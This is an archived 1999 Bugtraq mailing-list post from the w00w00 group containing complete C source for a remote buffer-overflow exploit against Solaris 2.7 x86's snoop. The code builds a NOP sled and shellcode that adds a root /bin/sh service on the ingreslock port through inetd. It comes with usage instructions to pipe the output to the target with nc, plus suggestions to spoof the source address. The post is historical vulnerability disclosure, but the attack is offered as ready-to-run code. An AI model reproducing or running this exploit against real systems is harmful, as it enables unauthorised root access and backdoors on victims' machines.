Archive : 1999 : december : snoop2 - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku
Re: w00giving #8] Solaris 2.7's snoop



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Чт, 09 дек 1999  14:56:47

   От: "Shane A. Macaulay" <ktwo@ITSEC.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: Re: w00giving #8] Solaris 2.7's snoop

--------------------------------------------------------------------------------




w00w00 Security Development (WSD)

http://www.w00w00.org/advisories.html



Discovered by: K2 (ktwo@ktwo.ca)



Hi,

        Here's a new version of my snoop exploit, it seems that it will

work on the new patched version of snoop aswell, and actually, the target

host dose NOT have to be running with -v.  Some interesting applications

would be to spoof the source and have it issue a remote command other then

loading a portshell.





K2

w00w00





/*

   by: K2,

   version .2

   this is a funny Solaris.

   remote Solaris 2.7 x86 snoop exploit

   rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW



   run with ( ./snp ) | nc -u target_host_network 53

   requires target host to be running "snoop"



   verified with patch 108483-01



   thx str/horizon for shellcodes.  Hi plageuz

   Hi mom.

*/

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>





char shell[] =

"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"

"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"

"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"

"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"

"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"

"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"

"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"

"\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock"

"stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;"

"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";





#define SIZE 2048

#define NOPDEF 349

#define DEFOFF 0



const char x86_nop=0x90;

long nop=NOPDEF,esp=0x804646c;

long offset=DEFOFF;

char buffer[SIZE];



int main (int argc, char *argv[]) {

    int i;



    if (argc > 1) offset += strtol(argv[1], NULL, 0);

    if (argc > 2) nop += strtoul(argv[2], NULL, 0);



    memset(buffer, x86_nop, SIZE);

    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4) {

        *((int *) &buffer[i]) = esp+offset;

    }



    fprintf(stderr,"0x%x\n",esp+offset);

    printf("%s", buffer);



    return 0;

}